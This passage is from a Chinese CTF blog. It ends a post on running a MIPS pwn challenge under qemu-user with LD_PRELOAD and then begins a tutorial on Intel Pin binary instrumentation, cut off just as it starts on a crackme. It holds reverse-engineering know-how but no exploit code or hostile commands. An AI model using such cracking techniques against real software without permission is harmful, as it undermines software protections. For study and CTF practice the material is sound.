</div><p>发现了问题，<code>/etc/ld.so.nohwacap</code>，<code>/etc/ld.so.preload</code> 这些文件不存在（原因可能是因为只用包管理装了对应 arch 的 libc 而没有其他信息）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> ls /usr/mips-linux-gnu lib <span class="c1"># 没有 etc 这个目录</span> </code></pre></td></tr></table> </div> </div><p>那么 <code>/etc/ld.so.nohwacap</code> 这些文件是什么作用呢？google 了一下，发现大概就是和 <code>LD_PRELOAD</code> 一个作用</p> <blockquote> <p><a href="https://superuser.com/a/1183252/960572">https://superuser.com/a/1183252/960572</a></p> </blockquote> <p>但知道了原因，不知道要怎么解决。。。刚开始是想看看有没有什么包能安装其他 arch 的 <code>/etc/ld.so.preload</code> 这些文件，但找了一圈没找到（如果有师傅有这样的解决方法请务必指教）。</p> <p>后来偶然搜索到了这部分的 <a href="https://code.woboq.org/userspace/glibc/elf/rtld.c.html#1606">源码</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> /* We have two ways to specify objects to preload: via environment variable and via the file /etc/ld.so.preload. The latter can also be used when security is enabled. */ assert (*first_preload == NULL); struct link_map **preloads = NULL; unsigned int npreloads = 0; if (__glibc_unlikely (preloadlist != NULL)) { HP_TIMING_NOW (start); npreloads += handle_ld_preload (preloadlist, main_map); HP_TIMING_NOW (stop); HP_TIMING_DIFF (diff, start, stop); HP_TIMING_ACCUM_NT (load_time, diff); } /* There usually is no ld.so.preload file, it should only be used for emergencies and testing. So the open call etc should usually fail. Using access() on a non-existing file is faster than using open(). So we do this first. If it succeeds we do almost twice the work but this does not matter, since it is not for production use. */ </code></pre></td></tr></table> </div> </div><p>从注释找到了解决方案，没有 <code>/etc/ld.so.preload</code>，我们还可以更改 <code>LD_PRELAOD</code> 这个环境变量。</p> <p>修改一下运行脚本</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> bat run.sh ───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────── │ File: run.sh ───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/usr/bin/env bash</span> <span class="m">2</span> │ <span class="nb">set</span> -euxo pipefail <span class="m">3</span> │ <span class="m">4</span> │ <span class="nv">LD_PRELOAD</span><span class="o">=</span><span class="s2">&#34;./lib/libc.so.6&#34;</span> <span class="s2">&#34;./lib/ld.so.1&#34;</span> <span class="s2">&#34;./mipstake&#34;</span> <span class="m">5</span> │ qemu-mips ./mipstake ───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────── pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> ./run.sh + <span class="nv">LD_PRELOAD</span><span class="o">=</span>./lib/libc.so.6 + ./lib/ld.so.1 ./mipstake ERROR: ld.so: object <span class="s1">&#39;./lib/libc.so.6&#39;</span> from LD_PRELOAD cannot be preloaded <span class="o">(</span>wrong ELF class: ELFCLASS32<span class="o">)</span>: ignored. no need to brute-force.. listening... ^C </code></pre></td></tr></table> </div> </div><p>终于可以正常运行了，虽然还有报错，但只是 64 位系统和 32 位 libc 的兼容问题，影响不大。</p> <h2 id="last">Last</h2> <p>后来又发现只用 user mode 的 qemu 来模拟还是有很多缺陷的。。。像 gdb-multriarch 莫名跑飞或者甚至文件都不能运行。踩了很多次坑后有如下发现：</p> <ol> <li>可以使用 docker，推荐 <code>skysider/multiarch-docker</code>。大部分的问题应该都能解决了</li> <li>如果再调试时有问题，可以试下不用 gdb plugin，有些插件对异架构的识别效果并不好</li> <li>如果还有问题，那就只能用系统级的 qemu 来模拟了，推荐一片 <a href="https://www.ringzerolabs.com/2018/03/the-wonderful-world-of-mips.html">文章</a></li> </ol> <p>如上边链接中所说</p> <blockquote> <p>MIPS system is generally the most effective method of debugging as you do not have to deal with the process being emulated inside of an x86 QEMU User Mode process.</p> </blockquote> <p>本文将不再更新(除非遇到很让人眼前一亮的方法)，但欢迎私下交流和介绍经验:)</p> <h2 id="reference-1">Reference</h2> <p><a href="https://elixir.bootlin.com/linux/v2.6.32.51/source/arch/arm/include/asm/unistd.h">https://elixir.bootlin.com/linux/v2.6.32.51/source/arch/arm/include/asm/unistd.h</a></p> <p><a href="https://bbs.pediy.com/thread-224583.htm">https://bbs.pediy.com/thread-224583.htm</a></p> <p><a href="https://courses.washington.edu/cp105/02_Exceptions/Calling%20Standard.html">https://courses.washington.edu/cp105/02_Exceptions/Calling%20Standard.html</a></p> <p><a href="http://hideroot.tistory.com/46">http://hideroot.tistory.com/46</a></p> <p><a href="http://www.freebuf.com/articles/terminal/134980.html">http://www.freebuf.com/articles/terminal/134980.html</a></p> <p><a href="https://code.woboq.org/userspace/glibc/elf/rtld.c.html#1606">https://code.woboq.org/userspace/glibc/elf/rtld.c.html#1606</a></p> <p><a href="https://superuser.com/a/1183252/960572">https://superuser.com/a/1183252/960572</a></p> <p><a href="https://www.ringzerolabs.com/2018/03/the-wonderful-world-of-mips.html">https://www.ringzerolabs.com/2018/03/the-wonderful-world-of-mips.html</a></p> https://bash-c.github.io/post/pin-in-ctf/ Tue, 03 Jul 2018 12:16:10 +0800 https://bash-c.github.io/post/pin-in-ctf/ <h1 id="intel-pin">intel pin</h1> <h2 id="什么是-pin">什么是 pin</h2> <p>pin 是 intel 开发的一款二进制程序的插桩分析工具，支持 x86/x64 &amp; windows/linux/mac，提供了丰富的 API 供使用者用 C/C++ 编写 pintool 分析程序</p> <h3 id="什么是插桩instrument">什么是插桩(instrument)</h3> <p>通俗的来说，插桩就是在已有的源代码/二进制程序中插入某些代码以便于自己分析，比如在调试时使用 printf 打印变量值就属于在源代码级别的插桩。而intel pin就是在二进制程序级别（没有源代码）插桩的一款工具</p> <h2 id="pin-和-pintool">pin 和 pintool</h2> <h3 id="pin-的安装pintool-的编译">pin 的安装，pintool 的编译</h3> <p>pin 的安装很简单，这里以 64 位的 Linux 为例来说明，从 <a href="https://software.intel.com/en-us/articles/pin-a-binary-instrumentation-tool-downloads">官网</a> 上下载 pin 组件后，解压即可，在解压后的文件夹内有编译好的二进制程序 pin</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pin-3.6-gcc-linux ls doc extlicense extras ia32 intel64 LICENSE pin README redist.txt <span class="nb">source</span> pin-3.6-gcc-linux file pin pin: ELF 32-bit LSB executable, Intel 80386, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, BuildID<span class="o">[</span>sha1<span class="o">]=</span>7beaa83f9142955a6e933bf29d4a8aa1269298bc, stripped pin-3.6-gcc-linux ./pin E: Missing application name Pin: pin-3.6-97554-31f0a167d Copyright <span class="o">(</span>c<span class="o">)</span> 2003-2017, Intel Corporation. All rights reserved. Usage: pin <span class="o">[</span>OPTION<span class="o">]</span> <span class="o">[</span>-t &lt;tool&gt; <span class="o">[</span>&lt;toolargs&gt;<span class="o">]]</span> -- &lt;<span class="nb">command</span> line&gt; Use -help <span class="k">for</span> a description of options </code></pre></td></tr></table> </div> </div><p>在 <strong>source/tools/ManualExamples</strong> 中有一些现成的 pintool 可以使用，基本涵盖了各个模块的用法，这里以 inscount0 这个 pintool 为例介绍 pin 的使用方法</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pin-3.6-gcc-linux <span class="nb">cd</span> source/tools/ManualExamples ManualExamples file inscount0.cpp inscount0.cpp: C source, ASCII text ManualExamples make obj-intel64/inscount0.so <span class="nv">TARGET</span><span class="o">=</span>intel64 g++ -Wall -Werror -Wno-unknown-pragmas -D__PIN__<span class="o">=</span><span class="m">1</span> -DPIN_CRT<span class="o">=</span><span class="m">1</span> -fno-stack-protector -fno-exceptions -funwind-tables -fasynchronous-unwind-tables -fno-rtti -DTARGET_IA32E -DHOST_IA32E -fPIC -DTARGET_LINUX -fabi-version<span class="o">=</span><span class="m">2</span> -I../../../source/include/pin -I../../../source/include/pin/gen -isystem /home/m4x/pin-3.6-gcc-linux/extras/stlport/include -isystem /home/m4x/pin-3.6-gcc-linux/extras/libstdc++/include -isystem /home/m4x/pin-3.6-gcc-linux/extras/crt/include -isystem /home/m4x/pin-3.6-gcc-linux/extras/crt/include/arch-x86_64 -isystem /home/m4x/pin-3.6-gcc-linux/extras/crt/include/kernel/uapi -isystem /home/m4x/pin-3.6-gcc-linux/extras/crt/include/kernel/uapi/asm-x86 -I../../../extras/components/include -I../../../extras/xed-intel64/include/xed -I../../../source/tools/InstLib -O3 -fomit-frame-pointer -fno-strict-aliasing -c -o obj-intel64/inscount0.o inscount0.cpp g++ -shared -Wl,--hash-style<span class="o">=</span>sysv ../../../intel64/runtime/pincrt/crtbeginS.o -Wl,-Bsymbolic -Wl,--version-script<span class="o">=</span>../../../source/include/pin/pintool.ver -fabi-version<span class="o">=</span><span class="m">2</span> -o obj-intel64/inscount0.so obj-intel64/inscount0.o -L../../../intel64/runtime/pincrt -L../../../intel64/lib -L../../../intel64/lib-ext -L../../../extras/xed-intel64/lib -lpin -lxed ../../../intel64/runtime/pincrt/crtendS.o -lpin3dwarf -ldl-dynamic -nostdlib -lstlport-dynamic -lm-dynamic -lc-dynamic -lunwind-dynamic ManualExamples file obj-intel64/inscount0.so obj-intel64/inscount0.so: ELF 64-bit LSB shared object, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, BuildID<span class="o">[</span>sha1<span class="o">]=</span>3baa29dd54235acaab02edc94bf9ac377dd7b0e5, not stripped </code></pre></td></tr></table> </div> </div><p>此时在 obj-intel64 下编译生成了 inscount0.so，这个 so 即为一种 pintool，功能为记录程序执行的指令的条数；</p> <blockquote> <p>判断 pintool 的功能可以阅读 pintool 源代码或者使用下条指令</p> <p>$ pin -t your_pintool -h &ndash; your_application</p> </blockquote> <p>类似的，要编译 32 位的 pintool 可以使用</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">make obj-ia32/inscount0.so </code></pre></td></tr></table> </div> </div><p>编译 ManualExamples 中的所有 pintool 可以使用</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">make all <span class="nv">TAEGET</span><span class="o">=</span>intel64 make all <span class="nv">TAEGET</span><span class="o">=</span>ia32 </code></pre></td></tr></table> </div> </div><h3 id="pin-的使用">pin 的使用</h3> <p>pin 的基本命令格式如下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pin -t your_pintool -- your_binary &lt;arg&gt; </code></pre></td></tr></table> </div> </div><p>以刚刚编译的 inscount0 这个 pintool 为例</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">ManualExamples ../../../pin -t ./obj-intel64/inscount0.so -- /bin/ls -a . inscount2.cpp obj-intel64 .. inscount.out pinatrace.cpp buffer_linux.cpp inscount_tls.cpp pin.log buffer_windows.cpp invocation.cpp proccount.cpp countreps.cpp isampling.cpp replacesigprobed.cpp detach.cpp itrace.cpp safecopy.cpp divide_by_zero_unix.c little_malloc.c stack-debugger.cpp divide_by_zero_win.c logtrace.cpp stack-debugger-tutorial.sln emudiv.cpp makefile stack-debugger-tutorial.vcxproj fibonacci.cpp makefile.rules stack-debugger-tutorial.vcxproj.filters follow_child_app1.cpp malloc.cpp statica.cpp follow_child_app2.cpp malloc_mt.cpp staticcount.cpp follow_child_tool.cpp malloctrace.cpp strace.cpp fork_app.cpp myInscount0.cpp <span class="nb">test</span> fork_jit_tool.cpp myInscount1.cpp test.c imageload.cpp myMalloctrace.cpp test-packed inscount0.cpp nonstatica.cpp tracer.cpp inscount1.cpp obj-ia32 w_malloctrace.cpp ManualExamples cat inscount.out Count <span class="m">813449</span> </code></pre></td></tr></table> </div> </div><p>inscount 默认结果保存在 inscount.out 这个文件中，在上例中，即此时 <strong>ls -a</strong> 这条命令共执行了 813449 条指令</p> <h3 id="pintool-的分析">pintool 的分析</h3> <p>同样以 inscount0 为例分析，查看 inscount0.cpp 的内容</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C++" data-lang="C++"><span class="cp">#include</span> <span class="cpf">&lt;iostream&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fstream&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&#34;pin.H&#34;</span><span class="cp"> </span><span class="cp"></span> <span class="n">ofstream</span> <span class="n">OutFile</span><span class="p">;</span> <span class="c1">// The running count of instructions is kept here </span><span class="c1">// make it static to help the compiler optimize docount </span><span class="c1"></span><span class="k">static</span> <span class="n">UINT64</span> <span class="n">icount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// This function is called before every instruction is executed </span><span class="c1"></span><span class="n">VOID</span> <span class="nf">docount</span><span class="p">()</span> <span class="p">{</span> <span class="n">icount</span><span class="o">++</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Pin calls this function every time a new instruction is encountered </span><span class="c1"></span><span class="n">VOID</span> <span class="nf">Instruction</span><span class="p">(</span><span class="n">INS</span> <span class="n">ins</span><span class="p">,</span> <span class="n">VOID</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Insert a call to docount before every instruction, no arguments are passed </span><span class="c1"></span> <span class="n">INS_InsertCall</span><span class="p">(</span><span class="n">ins</span><span class="p">,</span> <span class="n">IPOINT_BEFORE</span><span class="p">,</span> <span class="p">(</span><span class="n">AFUNPTR</span><span class="p">)</span><span class="n">docount</span><span class="p">,</span> <span class="n">IARG_END</span><span class="p">);</span> <span class="p">}</span> <span class="n">KNOB</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">KnobOutputFile</span><span class="p">(</span><span class="n">KNOB_MODE_WRITEONCE</span><span class="p">,</span> <span class="s">&#34;pintool&#34;</span><span class="p">,</span> <span class="s">&#34;o&#34;</span><span class="p">,</span> <span class="s">&#34;inscount.out&#34;</span><span class="p">,</span> <span class="s">&#34;specify output file name&#34;</span><span class="p">);</span> <span class="c1">// This function is called when the application exits </span><span class="c1"></span><span class="n">VOID</span> <span class="nf">Fini</span><span class="p">(</span><span class="n">INT32</span> <span class="n">code</span><span class="p">,</span> <span class="n">VOID</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Write to a file since cout and cerr maybe closed by the application </span><span class="c1"></span> <span class="n">OutFile</span><span class="p">.</span><span class="n">setf</span><span class="p">(</span><span class="n">ios</span><span class="o">::</span><span class="n">showbase</span><span class="p">);</span> <span class="n">OutFile</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;Count &#34;</span> <span class="o">&lt;&lt;</span> <span class="n">icount</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="n">OutFile</span><span class="p">.</span><span class="n">close</span><span class="p">();</span> <span class="p">}</span> <span class="cm">/* ===================================================================== */</span> <span class="cm">/* Print Help Message */</span> <span class="cm">/* ===================================================================== */</span> <span class="n">INT32</span> <span class="nf">Usage</span><span class="p">()</span> <span class="p">{</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;This tool counts the number of dynamic instructions executed&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span> <span class="o">&lt;&lt;</span> <span class="n">KNOB_BASE</span><span class="o">::</span><span class="n">StringKnobSummary</span><span class="p">()</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="p">}</span> <span class="cm">/* ===================================================================== */</span> <span class="cm">/* Main */</span> <span class="cm">/* ===================================================================== */</span> <span class="cm">/* argc, argv are the entire command line: pin -t &lt;toolname&gt; -- ... */</span> <span class="cm">/* ===================================================================== */</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span> <span class="c1">// Initialize pin </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="n">PIN_Init</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span> <span class="n">argv</span><span class="p">))</span> <span class="k">return</span> <span class="n">Usage</span><span class="p">();</span> <span class="n">OutFile</span><span class="p">.</span><span class="n">open</span><span class="p">(</span><span class="n">KnobOutputFile</span><span class="p">.</span><span class="n">Value</span><span class="p">().</span><span class="n">c_str</span><span class="p">());</span> <span class="c1">// Register Instruction to be called to instrument instructions </span><span class="c1"></span> <span class="n">INS_AddInstrumentFunction</span><span class="p">(</span><span class="n">Instruction</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Register Fini to be called when the application exits </span><span class="c1"></span> <span class="n">PIN_AddFiniFunction</span><span class="p">(</span><span class="n">Fini</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Start the program, never returns </span><span class="c1"></span> <span class="n">PIN_StartProgram</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>从 main 开始，首先调用了 PIN_init（53 行）进行初始化，然后使用 INS_AddInstrumenFunction 注册了一个插桩函数(58行)，根据 intel pin 的 <a href="https://software.intel.com/sites/landingpage/pintool/docs/97619/Pin/html/">用户手册</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">PIN_CALLBACK</span> <span class="n">LEVEL_PINCLIENT</span><span class="o">::</span><span class="n">INS_AddInstrumentFunction</span> <span class="p">(</span> <span class="n">INS_INSTRUMENT_CALLBACK</span> <span class="n">fun</span><span class="p">,</span> <span class="n">VOID</span> <span class="o">*</span> <span class="n">val</span> <span class="p">)</span> <span class="n">Add</span> <span class="n">a</span> <span class="n">function</span> <span class="n">used</span> <span class="n">to</span> <span class="n">instrument</span> <span class="n">at</span> <span class="n">instruction</span> <span class="n">granularity</span> <span class="nl">Parameters</span><span class="p">:</span> <span class="n">fun</span> <span class="n">Instrumentation</span> <span class="n">function</span> <span class="k">for</span> <span class="n">instructions</span> <span class="n">val</span> <span class="n">passed</span> <span class="n">as</span> <span class="n">the</span> <span class="n">second</span> <span class="n">argument</span> <span class="n">to</span> <span class="n">the</span> <span class="n">instrumentation</span> <span class="n">function</span> <span class="nl">Returns</span><span class="p">:</span> <span class="n">PIN_CALLBACK</span> <span class="n">A</span> <span class="n">handle</span> <span class="n">to</span> <span class="n">a</span> <span class="n">callback</span> <span class="n">that</span> <span class="n">can</span> <span class="n">be</span> <span class="n">used</span> <span class="n">to</span> <span class="n">further</span> <span class="n">modify</span> <span class="n">this</span> <span class="n">callback</span><span class="err">&#39;</span><span class="n">s</span> <span class="n">properties</span> <span class="nl">Note</span><span class="p">:</span> <span class="n">The</span> <span class="n">pin</span> <span class="n">client</span> <span class="n">lock</span> <span class="n">is</span> <span class="n">obtained</span> <span class="n">during</span> <span class="n">the</span> <span class="n">call</span> <span class="n">of</span> <span class="n">this</span> <span class="n">API</span><span class="p">.</span> <span class="nl">Availability</span><span class="p">:</span> <span class="nl">Mode</span><span class="p">:</span> <span class="n">JIT</span> <span class="n">O</span><span class="o">/</span><span class="nl">S</span><span class="p">:</span> <span class="n">Linux</span><span class="p">,</span> <span class="n">Windows</span> <span class="o">&amp;</span> <span class="n">OS</span> <span class="n">X</span><span class="o">*</span> <span class="nl">CPU</span><span class="p">:</span> <span class="n">All</span> </code></pre></td></tr></table> </div> </div><p>在这里该函数的作用是在指令粒度插入 Instruction 函数，即在每条指令执行前，都会进入 Instruction 这个函数中，其第2个参数为一个额外传递给 Instruction 的参数，即对应 <code>VOID *v</code> 这个参数，这里没有使用。而 Instruction 接受的第一个参数为 <code>INS</code> 结构，用来表示一条指令</p> <p>而我们再看 Instruction 这个函数</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">VOID</span> <span class="nf">Instruction</span><span class="p">(</span><span class="n">INS</span> <span class="n">ins</span><span class="p">,</span> <span class="n">VOID</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Insert a call to docount before every instruction, no arguments are passed </span><span class="c1"></span> <span class="n">INS_InsertCall</span><span class="p">(</span><span class="n">ins</span><span class="p">,</span> <span class="n">IPOINT_BEFORE</span><span class="p">,</span> <span class="p">(</span><span class="n">AFUNPTR</span><span class="p">)</span><span class="n">docount</span><span class="p">,</span> <span class="n">IARG_END</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>在 Instruction 函数内部又使用 INS_InsertCall 注册了一个函数 docount，即在每条指令前实际插入了 docount 这个函数。需要注意的是 INS_InsertCall 试一个便餐函数，前三个参数分别为指令(ins)，插入的实际(IPOINT_BEFORE，表示在指令运行之前插入 docount 函数)，函数指针(docount，转化为了 AFUNPTR 类型)，之后的参数为传递给 docount 函数的参数，以 IARG_END 结尾</p> <p>而 docount 函数（12 行）的作用就很明显了，每次将一个全局变量加 1，因此此时 /bin/ls -a 运行的模式如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">... icount++; sub $0xff, %edx icount++; cmp %esi, %edx icount++; jle &lt;L1&gt; icount++; mov $0x1, %edi icount++; add $0x10, %eax ... </code></pre></td></tr></table> </div> </div><p>所以 inscount0 的用途就很明显了，每条指令前都调用 docount 函数将全局变量 icount 自增，最后通过PIN_AddFiniFunction 函数注册的 Fini 函数(25行)将结果写到一个文件中。</p> <p>当这些函数都定义完后，就可以使用 PIN_StartProgram 来启动程序了</p> <p>这里分析了一个最简单的 pintool 例子，更多 pintool 例子的分析和其他函数的使用可以参考 BrieflyX 的 <a href="http://brieflyx.me/2017/binary-analysis/intel-pin-intro/">博客</a></p> <h2 id="pin-in-ctf">pin in CTF</h2> <p>因为动态插桩有不重新编译即可收集二进制程序某些信息的特性，因此用 pin 求解<strong>一部分</strong> CTF challenges 会异常的方便，下边给出一些例子和分析</p> <h3 id="ndh2k13-crackme-500">NDH2K13-crackme-500</h3> <p>首先用常规方法对 crackme 文件进行分析</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">NDH2k13-crackme-500 <span class="o">[</span>master<span class="o">]</span> file crackme crackme: ELF 64-bit LSB executable, x86-64, invalid version <span class="o">(</span>SYSV<span class="o">)</span>, <span class="k">for</span> GNU/Linux 2.6.9, statically linked, corrupted section header size NDH2k13-crackme-500 <span class="o">[</span>master<span class="o">]</span> nm ./crackme nm: out of memory allocating <span class="m">109524665216</span> bytes after a total of <span class="m">0</span> bytes NDH2k13-crackme-500 <span class="o">[</span>master<span class="o">]</span> objdump -d ./crackme -M intel objdump: ./crackme: 不可识别的文件格式 NDH2k13-crackme-500 <span class="o">[</span>master<span class="o">]</span> ./crackme Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: <span class="nb">test</span> Bad password </code></pre></td></tr></table> </div> </div><p>发现 section header 受到了损坏，用 IDA 打开时也有很多报错，这时我们尝试使用 intel pin 